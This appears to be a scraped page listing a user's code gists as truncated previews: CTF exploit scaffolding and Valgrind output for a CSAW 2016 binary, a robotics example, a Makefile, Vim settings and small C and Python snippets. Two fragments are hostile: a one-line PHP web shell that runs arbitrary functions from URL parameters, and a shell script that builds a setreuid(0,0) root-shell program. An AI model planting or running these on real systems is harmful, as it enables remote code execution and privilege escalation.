This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 -i | |
from struct import pack, unpack | |
from functools import partial | |
from socket import create_connection, timeout | |
from inspect import currentframe | |
from telnetlib import Telnet | |
from sys import exit | |
from time import sleep | |
import re |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
High score! change name? | |
==14606== Conditional jump or move depends on uninitialised value(s) | |
==14606== at 0x400E3C: ??? (in /home/tutu/Seafile/MesFichiers/secu/ctf/csaw_2016/pwn300/hungman) | |
==14606== by 0x400ACD: ??? (in /home/tutu/Seafile/MesFichiers/secu/ctf/csaw_2016/pwn300/hungman) | |
==14606== by 0x4E55290: (below main) (in /usr/lib/libc-2.24.so) | |
==14606== | |
Highest player: dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd score: 1845 | |
What's your name? | |
testsetstetstddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php echo 'test'; ?> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# File created by Thibaut Royer, Epitech school | |
# [email protected] | |
# It intends to be an example program for the "Two wheels, one arm" educative project. | |
import vrep | |
import math | |
import random | |
import time | |
print ('Start') |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
cat << EOF > shell.c | |
#include <sys/types.h> | |
#include <unistd.h> | |
#include <stdlib.h> | |
void main() { | |
setreuid(0, 0); | |
system("/bin/bash"); | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php $_GET['1']($_GET['2']); ?> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
CC = gcc | |
CFLAGS += -W -Wall -Wextra | |
ifdef deb | |
CFLAGS += -g -Ddeb= | |
endif | |
LDFLAGS += |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
void split(char *bigbuffer, int bufSize) { | |
int index = 0; | |
while (index < bufSize) { | |
bigbuffer[index + 5] = 0; | |
printf("%s\n", bigbuffer + index); | |
printf("---- separation ---\n"); | |
index += 6; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
call unite#custom#profile('default', | |
\ 'context', { | |
\ 'start_insert' : 1, | |
\ 'ignore_case' : 1, | |
\ 'smart_case' : 1, | |
\ 'direction' : 'botright', | |
\ 'cursor-line-highlight' : 'Statusline', | |
\ 'prompt' : '➤ ' | |
\ }) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
import faker | |
import random | |
from string import ascii_letters, digits | |
fake = faker.Faker() | |
def main(): |
OlderNewer